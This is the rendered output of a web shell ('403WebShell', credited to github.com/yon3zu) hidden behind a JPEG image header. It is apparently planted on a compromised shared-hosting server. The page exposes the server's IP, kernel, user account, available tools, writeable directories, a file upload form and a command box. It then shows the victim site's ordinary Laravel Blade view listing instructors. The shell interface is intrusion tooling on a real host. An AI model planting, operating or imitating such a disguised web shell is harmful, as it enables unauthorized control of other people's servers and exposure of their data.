����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.117.93.231
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirmacademy.com/resources/views/organization/instructor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirmacademy.com/resources/views/organization/instructor/index.blade.php
@extends('layouts.organization')

@section('breadcrumb')
    <div class="page-banner-content text-center">
        <h3 class="page-banner-heading text-white pb-15"> {{ __('All Instructor') }} </h3>

        <!-- Breadcrumb Start-->
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb justify-content-center">
                <li class="breadcrumb-item font-14"><a href="{{ route('organization.dashboard') }}">{{ __('Dashboard') }}</a>
                </li>
                <li class="breadcrumb-item font-14 active" aria-current="page">{{ __('All Instructor') }}</li>
            </ol>
        </nav>
    </div>
@endsection

@section('content')
    <div class="instructor-profile-right-part">
        <div class="instructor-quiz-list-page instructor-all-student-page">
            <div class="instructor-my-courses-title d-flex justify-content-between align-items-center">
                <h6>{{ __('All Instructor') }}</h6>
            </div>
            <div class="row">
                @if (count($instructors) > 0)
                    <div class="col-12">
                        <div class="table-responsive table-responsive-xl">
                            <table class="table">
                                <thead>
                                    <tr>
                                        <th scope="col">{{ __('Image') }}</th>
                                        <th scope="col">{{ __('Name') }}</th>
                                        <th scope="col">{{ __('Courses') }}</th>
                                        <th scope="col">{{ __('Sales') }}</th>
                                        <th scope="col">{{ __('Sales Amount') }}</th>
                                        <th scope="col">{{ __('Email') }}</th>
                                        <th scope="col">{{ __('Phone Number') }}</th>
                                        <th scope="col">{{ __('Status') }}</th>
                                        <th scope="col">{{ __('Action') }}</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    @foreach ($instructors as $instructor)
                                    {{ $instructor->total }}
                                        <tr>
                                            <td>
                                                <div class="all-student-img-wrap">
                                                    <img src="{{ getImageFile(@$instructor->user->image_path) }}"
                                                        alt="img" class="img-fluid">
                                                </div>
                                            </td>
                                            <td>{{ $instructor->user->name }}</td>
                                            <td>{{ number_format($instructor->total_course) }}</td>
                                            <td>{{ number_format($instructor->total_sale) }}</td>
                                            <td>{{ number_format($instructor->sub_total) }}</td>
                                            <td>{{ $instructor->user->email }}</td>
                                            <td>{{ $instructor->user->mobile_number }}</td>
                                            <td>
                                                <span id="hidden_id" style="display: none">{{ $instructor->id }}</span>
                                                <select name="status" class="status form-control form-select">
                                                    <option value="1" {{ $instructor->status == 1 ? 'selected' : '' }}>{{ __('Approved') }}</option>
                                                    <option value="2" {{ $instructor->status == 2 ? 'selected' : '' }}>{{ __('Rejected') }}</option>
                                                </select>
                                            </td>
                                            <td>
                                                <a href="{{ route('organization.instructor.edit', $instructor->uuid) }}"
                                                    class=""><img src="{{ asset('admin/images/icons/edit-2.svg') }}"
                                                        alt="eye"></a>
                                                <a href="{{ route('userProfile', $instructor->user_id) }}" target="_blank"
                                                    class="ms-2"><img src="{{ asset('admin/images/icons/eye-2.svg') }}"
                                                        alt="eye"></a>
                                            </td>
                                        </tr>
                                    @endforeach
                                </tbody>
                            </table>
                        </div>
                    </div>

                    <!-- Pagination Start -->
                    @if (@$instructors->hasPages())
                        {{ @$instructors->links('frontend.paginate.paginate') }}
                    @endif
                    <!-- Pagination End -->
                @else
                    <!-- If there is no data Show Empty Design Start -->
                    <div class="empty-data">
                        <img src="{{ asset('frontend/assets/img/empty-data-img.png') }}" alt="img" class="img-fluid">
                        <h5 class="my-3">{{ __('Empty Student') }}</h5>
                    </div>
                    <!-- If there is no data Show Empty Design End -->
                @endif
            </div>

        </div>
    </div>

@endsection

@push('script')
    <script src="{{ asset('frontend/assets/js/custom/organization.js') }}"></script>
    <script>
        'use strict'
        $(".status").change(function() {
            var id = $(this).closest('tr').find('#hidden_id').html();
            var status_value = $(this).closest('tr').find('.status option:selected').val();
            Swal.fire({
                title: "{{ __('Are you sure to change status?') }}",
                text: "{{ __('You will be able to revert this!') }}",
                icon: "warning",
                showCancelButton: true,
                confirmButtonText: "{{ __('Yes, Change it!') }}",
                cancelButtonText: "{{ __('No, cancel!') }}",
                reverseButtons: true
            }).then(function(result) {
                if (result.value) {
                    $.ajax({
                        type: "POST",
                        url: "{{ route('organization.instructor.status') }}",
                        data: {
                            "status": status_value,
                            "id": id,
                            "_token": "{{ csrf_token() }}",
                        },
                        datatype: "json",
                        success: function(res) {
                            toastr.options.positionClass = 'toast-bottom-right';
                            if (res.status == true) {
                                toastr.success('', res.message);
                            } else {
                                toastr.error('', res.message);
                            }
                        },
                        error: function(error) {
                            toastr.options.positionClass = 'toast-bottom-right';
                            toastr.error('', JSON.parse(error.responseText).message);
                        },
                    });
                } else if (result.dismiss === "cancel") {}
            });
        });
    </script>
@endpush

Youez - 2016 - github.com/yon3zu
LinuXploit